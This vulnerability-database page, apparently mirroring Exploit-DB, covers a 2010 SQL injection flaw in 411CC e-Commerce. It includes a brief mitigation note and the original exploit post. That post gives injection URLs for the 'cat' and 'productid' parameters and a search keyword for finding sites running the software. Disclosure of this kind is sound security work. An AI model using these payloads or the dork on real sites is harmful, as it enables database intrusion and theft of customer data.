header-logo
Suggest Exploit
vendor:
e-Commerce
by:
KnocKout
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: e-Commerce
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Vista, PHP/4.3.9
2010

411CC e-Commerce <= String(') SQL Injection Vulnerabilities

411CC e-Commerce is vulnerable to SQL injection attacks when a malicious user supplies a single quote (') character as part of a query string parameter. This can be exploited to execute arbitrary SQL commands in the back-end database. The vulnerable parameters are 'cat' in the 'home.php' script and 'productid' in the 'product.php' script.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.
Source

Exploit-DB raw data:

===================================================================
411CC e-Commerce <= String(') SQL Injection Vulnerabilities
===================================================================
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockoutr@msn.com
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~Web App. : 411CC e-Commerce
~Version : N/A
~Software: http://www.411cc.com/
~Vulnerability Style : SQL Injection
~Vulnerability Dir : CCART/customer/
~Google Keyword : "Powered By: 411CC"
~SQL Method : MSSQL no error
~String : '
[~]Date : "18.10.2010"
[~]Tested on : (L):Vista, (R):PHP/4.3.9

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
 
    ~~~~~~~~ Explotation ~~~~~~~~~~~
    String (') SQL Injection Attack..
    http://VICTIM/cccart/customer/home.php?cat=59' {SQL Injection}
    http://VICTIM/cccart/customer/home.php?cat=59' HAVING 1=1/*
    http://VICTIM/cccart/customer/product.php?productid=' {SQL Injection}
    http://VICTIM/cccart/customer/product.php?productid='%27%20having%201=1/*
    ================================
    
     GoodLUCK.

Navigation

Suggest Exploit

Services By CQR